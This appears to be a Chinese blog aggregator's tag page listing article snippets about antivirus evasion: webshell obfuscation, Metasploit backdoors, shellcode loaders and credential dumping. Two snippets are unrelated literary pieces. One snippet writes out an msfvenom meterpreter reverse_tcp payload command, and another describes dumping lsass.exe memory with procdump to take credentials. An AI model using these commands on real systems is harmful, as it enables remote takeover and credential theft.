veil免杀

vulntarget-b靶场详细通关记录

vulntarget-b靶场详细通关记录前言这个靶场打了好几天才打下来,在上线msf和免杀过火绒还有psexec横向移动中卡了很久。
tpaer·2022-11-24 11:17

免杀实战之面向PHP的WebShell免杀

0X00普通的一句话木马//函数的相似替换与第一个一句话木马相比多了一个"@“字符,我们发现这个字符的含义是在php语法中表示抑制错误信息即使有错误也不返回;属于不太重要的"组件”,而且它的写入位置也相对灵活;可以是eval函数前面,也可以是post函数前面…接着我们看第二个代码,我们发现它把eval函数替换为了assert函数;这时我们通过查看PHP手册发现如下区别:eval():函数把字符串当
kali_Ma·2022-10-21 07:39

[系统安全]《黑客免杀攻防》MFC逆向基础实战

本文为笔者从零基础学习系统安全相关内容的笔记,如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容,欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新,由于笔者现阶段还处于初学阶段,不可避免参照复现各类书籍内容,如书籍作者认为侵权请告知,笔者将立刻删除。强调本系列所有内容仅作为学习研究使用,作者对此文章中的代码造成的任何后果不负法律责任。前文链接[系统安全]PE文件格式详解1[系
H4ppyD0g·2022-10-14 22:12

[系统安全]《黑客免杀攻防》逆向基础之经典脱壳基础

本文为笔者从零基础学习系统安全相关内容的笔记,如果您对系统安全、逆向分析等内容感兴趣或者想要了解一些内容,欢迎关注。本系列文章将会随着笔者在未来三年的读研过程中持续更新,由于笔者现阶段还处于初学阶段,不可避免参照复现各类书籍内容,如书籍作者认为侵权请告知,笔者将立刻删除。强调本系列所有内容仅作为学习研究使用,作者对此文章中的代码造成的任何后果不负法律责任。前文链接[系统安全]PE文件格式详解1[系
H4ppyD0g·2022-10-14 22:12

[渗透测试笔记] 52.告别初级,日薪2k的蓝队hw中级定级必备笔记

文章目录权限维持横向移动内网渗透域渗透溯源CS和msf联动提权工具免杀webshell管理工具常用windows命令DMZvenom和proxchains代理流程应急响应web日志Apache日志Tomcat
H4ppyD0g·2022-10-14 22:12

【网络安全】渗透测试之木马免杀

博主座右铭:发现光,追随光,成为光,散发光;博主研究方向:渗透测试、机器学习;博主寄语:感谢各位技术友的支持,您的支持就是我前进的动力;目录一、免杀概念1.什么是免杀2.杀软的查杀方法(1)
跳楼梯企鹅·2022-10-04 20:31

安全专业词汇(部分)

安全专业词汇(部分)footprinting踩点Dos拒绝服务攻击DDos分布式拒绝服务攻击RAT远程管理工具FUD免杀Rootkit嵌入到进程中,隐藏起来的服务Fishing钓鱼sqlinjectionsql
ZHFTT917·2022-10-04 12:10

渗透测试(一)-Msf生成免杀后门(内网篇)

实验环境:攻击机:kalilinux-2021.1(192.168.56.128)靶机:Windows10(192.168.1.120)推荐两个免费在线木马检测网站:VirusScan和VirusTotal原理图:1.Meterpreter简介Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作
国民老公阿航·2022-09-29 08:53

安全防御(四)--- 恶意软件及其特征、分类、免杀技术,反病毒技术,反病毒网关工作过程及其配置

四、恶意软件的免杀技术有哪些?五、反病毒技术有哪些?六、反病毒网关的工作原理是什么?七、反病毒网关的工作过程是什么?
爱喝咖啡的果子·2022-09-15 10:06

红队社工之BadUSB

文章目录什么是BadUSBBadUSB攻击方式制作BadUSB作用目标机器默认中文输入法解决方法cs免杀马键盘操作流程编译烧录防御措施什么是BadUSBBadUSB最早是在2014年的黑帽大会上研究人员
sec0nd_·2022-09-11 11:04

Bypass Windows Defender Dump Lsass(手法拙劣)

操作系统的杀毒软件程序,本文旨在记录实战环境中,服务器存在WindowsDefender情况下转储凭证的渗透手法,技术简单粗糙,但是有效,各位轻喷,抱拳.jpg0x01.前提条件能够落地DumpLsass的免杀程序
zha0gongz1·2022-09-07 14:00

木马免杀

最近学了点木马免杀,其实总结起来一共有三个层面,代码面,文件面,逻辑面。
Ray言午·2022-09-01 19:00

MSF(2)——各种木马的生成及简单的免杀

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记文章目录前文链接木马生成免杀php免杀Python免杀分析木马文件编写免杀马打包exe前文链接WAMP/DVWA/sqli-labs搭建burpsuite
漫路在线·2022-08-31 07:33

安全攻防实战系列MSF

前言在红队攻防中,我们主要在外网进行信息收集,通过cms或者其他漏洞拿到shell,之后通过免杀木马将windows或linux服务器上线到cobaltstrike或msf等c2服务器,之后对内网进行信息收集并绘制网络拓扑图
普通网友·2022-08-22 17:37

一个免杀项目分享

这个本来是为某大型活动准备的,经过实战测试,效果还行,实战中即使用户电脑存在杀软进程,cs也能稳定上线。现在活动结束,平时基本也用不上了,所以分享出来以供技术交流(本着能用就行的原则没来得及重构,项目结构有点乱)
9eek·2022-08-18 17:00

网络攻防——kali操作系统基本使用

2.环境安装生成木马主要需要如下工具:kali操作系统,VMware15(搭建kali操作系统环境,防止影响自己的windows系统的正常运行),Themida(免杀加壳工具,防止被电脑或者手机的安全工具查杀
普通网友·2022-08-03 11:53

一句话木马

入侵条件(1)木马上传成功,未被杀(木马免杀);(2)知道木马在网站存储的路径在哪;(3)上传的木马能正常运行。代码
weixin_47836220·2022-07-27 11:30

免杀工具BypassAv-web使用教程

0x01介绍nim一键木马免杀项目,目前能完美过360、火绒等杀软。作者使用纯nim语言编写的shellcode记载器,代码基本是从之前c++版本平移过来,作者并没有提供部署教程,踩坑记录下。
kracer127·2022-07-27 11:04

乌鸦安全2021年度文章合集

你可以在这里找到我:GitHub:https://github.com/crow821B站:https://space.bilibili.com/299031221.免杀Invoke-Obfuscation
乌鸦安全·2022-07-21 11:10

易经的“中庸”思想二 见好就收

刘邦马上要建立大汉了,张良就找到韩信说,如果你现在功成身退,能避免杀身之祸。韩信没听张良的苦劝,他觉得刘邦能赢,就功劳我韩信没有一百,也有八十啊,怎么也得分为半壁河山,于是继续选择跟随刘邦。
摸鱼的豌豆·2022-07-21 00:38

免杀】————4、Webshell如何bypass安全狗,D盾

前言相信各位师傅都有自己过waf一句话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的github地址抱歉还不能给你们,(毕设没答辩完,而且还没写完Orz)Webshell这里,我主要是写phpwebshell的bypass(主要是其他的没研究过),安全狗的版本是在官网下载的apache4.0版本。D盾是2.0.9的在bypass之前我们得先了
FLy_鹏程万里·2022-07-04 21:14

pyinstaller打包exe免杀和逆向浅析

本文首发于先知,免杀跨度时间长。全文:11720字,110图,阅读时间预计:30分钟。
乌鸦安全·2022-06-11 12:48

内网渗透 | powershell&wmic详解

基本使用0x004常用命令0x005powershell脚本0x006参考文章WMIC0x001基本概念0x002命令格式0x003常用命令1、目标系统相关2、用户管理0x004参考文章引子之前在内网渗透,免杀中到处能看到
1ance.·2022-05-29 13:34

MSF内网渗透实战

小熊保安本来还是想用cobaltstrike,但是由于某些原因,暂时关闭了cobaltstrike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀
zkzq·2022-05-21 16:46

【原创】ShellCode免杀的骚姿势

ShellCode免杀的骚姿势常见的免杀手法:shellcode(攻击代码)和加载程序的分离;Lolbins白利用加载shellcode(白名单利用);shellcode混淆、编码解码;shellcode
黑羽sec·2022-05-05 14:00

PE文件结构与程序装载

PE文件结构与程序装载是掌握Windows逆向、加壳、免杀等技术的基础,本文详细记录了PE文件的基本结构,用编辑器对文件结构进行分析,并介绍程序装载的相关概念和基本过程。
Captain_RB·2022-05-05 08:42

第48天-WAF 绕过-权限控制之代码混淆及行为造轮子

思维导图Safedog代码层手写及脚本绕过变量覆盖,加密混淆,异或生成BTAliyun代码层手写及脚本绕过编码解码(变量覆盖,加密混淆,异或生成)ASP,PHP,ASPX,JSP,PY等后门免杀同理一句话后门的原理
IsecNoob·2022-04-18 12:17

Spring框架漏洞合集

前言上周用了一周的时间把java基础部分看完了(也就是能看懂代码),打算把常见java框架的漏洞复现一下,后面着重web端的渗透测试以及实战项目,还要学免杀、社工(任重道远),所以不打算学习java框架了
X1m0·2022-03-30 08:24

vulntarget-a靶场的学习思考

前言:最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境靶场由星期五实验室与乌鸦安全共同维护
vlan911·2022-03-23 21:34

数据包中的加密之RC4加密介绍

在一次偶然间对GitHub上找的免杀马代码学习的时候才认识了这个加密方式,在这个行业之间人与人的差距不是一点半点。介绍:RC4算法的特点是算法简单,执行速度快。
你可以叫我风平·2022-03-23 10:24

Python安全开发——多线程Fuzz&Waf 异或免杀&爆破

1.概述:知识点:协议模块使用,Request爬虫技术,简易多线程技术,编码技术,Bypass后门技术目的:掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合Fuzz吊打WAF等2.简单多线程技术、FTP模块实现协议爆破脚本:queue,threading模块使用、ftplib模块使用:遍历用户及密码字典、尝试连接执行命令判断ftp模块使用:https://www.cnblogs.com
暮w光·2022-03-09 05:46

Jsp Webshell 免杀-命令执行

在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。命令执行在之前的Java命令执行中学习了执行系统命令的几个类。这次我们还是以经典的Runtime类来测试。")
CSeroad·2022-03-07 10:30

Jsp Webshell 免杀-类加载器

前言在经过java类加载器的学习,我们对webshell的免杀处理就可以更进一步。自定义类加载器-命令执行对于如何自定义类加载的详细过程,可参考Java类加载器学习。这里就不多阐述了。
CSeroad·2022-02-17 15:12

Walter Fane in "The Painted Veil"

读书,尤其是读小说的愉悦感之一,是这些文字表达了你想说而说不出的感受,或者以一种更生动的手法刻画了你的生活以及身边人,读到这些文字,常常让人忍不住感叹,啊,这说的不就是我吗?最近,给我带来这种感觉的是毛姆的,毛姆从妻子kitty的视角刻画了丈夫WalterFane的木讷寡言,这些文字一下子击中了我,因为它们看上去就像是我的朋友会对我说的话.剧照(帅帅的诺顿)Hehadawaywhichexaspe
欢喜_9acf·2022-02-15 14:11

记一则免杀技巧

CobaltStrike+Metasploit联动里提到了CS与MSF联动的场景类似这种后渗透环境中,我一直在琢磨怎样才能神不知鬼不觉地执行一个meterpreter这种功能强大的Payload网上关于免杀和隐蔽执行的思路与技巧有很多
慕长风啊·2022-02-14 11:38

刚工作,不知道怎么变得专业

今天特么可贼热,我QQ上又来了一个想搞暧昧的寂寞人,我拒绝了一次,哎,又给我来了第二次,可是特么这样都能撩动我,可见人性是多么软弱,理智是多么脆弱,我活了20年,就是跟人性斗争的血泪史,他让我避免杀身之祸
三个么么哒·2022-02-09 14:39

webshell之jsp免杀

webshell之jsp免杀转载自webshell免杀研究原理向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。
tomyyyyy·2022-02-05 21:06

weevely的使用及免杀(Linux中的菜刀)

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记前文链接WAMP/DVWA/sqli-labs搭建burpsuite工具抓包及Intruder暴力破解的使用目录扫描,请求重发,漏洞扫描等工具的使用网站信息收集及nmap的下载使用SQL注入(1)——了解成因和手工注入方法SQL注入(2)——各种注入SQL注入(3)——SQLMAPSQL注入(4)——实战SQL注入拿webshellVulnhu
漫路在线·2022-02-04 16:05

免杀技术】Tomcat内存马-Filter

Tomcat内存马-Filter型什么是内存马?为什么要有内存马?什么又是Filter型内存马?这些问题在此就不做赘述Filter加载流程分析tomcat启动后正常情况下对于Filter的处理过程:加载web.xml配置文件读取filter的信息,并将其保存在context对象里的filterDef,filterConfigs,filterMappers中filterChain的构造流程:1.匹配
Aurora-M·2022-02-04 15:00

VC++源码免杀教程 286合购网ghost免杀教程

网络攻防技术中的免杀技术是十分有趣的,尤其要说ghostvc++源码免杀,过掉国内的杀毒软件,达到不损坏功能,正常上线,从而无视杀软的存在.免杀之网络攻防入门书籍推荐1.杀不死的秘密-反汇编揭露黑客免杀变种技术
玩弄你们·2022-02-03 06:16

内网渗透-免杀抓取windows hash

前言内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。大部分情况会遇到防护软件,常规抓取方法失效,因此需要对防护进行绕过。Procdump.exeProcdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。首先使用procdump.exe把进程lsass.exe的内存dump下来procdump.exe-acce
Tide_诺言·2022-02-02 22:05

Python免杀木马轻松过Defender,秒杀36*和火*

测试环境联网的Win10,开启了Defender最新的火绒和360杀毒Defender肯定要取消上传可疑文件的!测试步骤这里使用CS生成python类型的木马文件,并对生成的shellcode进行Base64编码和HEX编码,将编码后的shellcode分成几个文件存放,再去请求下载并解码,最后将解码后的shellcode加载到内存中。编译成EXE,顺便使用upx压缩下:开启Defender的Wi
LMcream·2022-01-27 09:21

红队远控免杀初探

免杀初探自己一直是研究wb安全方向比较多,对红队远控免杀的认知基本没有,一直是听着大哥们说,却一直没有静下心来系统性的学习过,这里记录下免杀的学习记录。
CKCsec·2021-12-02 14:46

Assassin暗杀者-自用短小精悍的webshell管理工具分享

自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀毒软件(36x、腾x等,目前能过,后面可能很快就不行了,需要稍微变换webshell代码以再次免杀)连接后交互的流量特征几乎没有
b1ackc4t·2021-11-23 21:00

windows命令混淆

最近有些朋友问我一些免杀问题,由于个人技术有限,对静态免杀有些了解(动态免杀真的不会,太菜了),所以就总结了一些Windows中cmd的命令混淆思路,静态免杀无非就是对安全设备检测到代码(命令)中的特征字符进行查杀
·2021-11-10 17:19

【Web安全】JSP内存马研究

前言最近在研究webshell免杀的问题,到了内存马免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的
IT老涵·2021-10-19 16:08

Metasploit 实现木马生成、捆绑及免杀

木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。
·2021-10-08 14:06

渗透测试-木马免杀的几种方式

前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。
白面安全猿·2021-09-28 21:25

《水浒传》专题探究之英雄辨析(二)

结识英雄过渡语:有人说,这些梁山好汉中,有些人不是“真英雄”,如宋江怕李逵造反,在临死前为了保住自己的虚名,竟然毒死自己肝胆相照的好兄弟,不是英雄所为;武松在血洗鸳鸯楼时,杀死张都监家眷和仆人十几人,不免杀心过重
一一真·2021-09-23 03:38

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

文章来源|MS08067红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfvenom生成payload,命令如下:msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.61.103lport=4444-ex86/shikata_ga_n
Ms08067安全实验室·2021-09-01 07:00
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他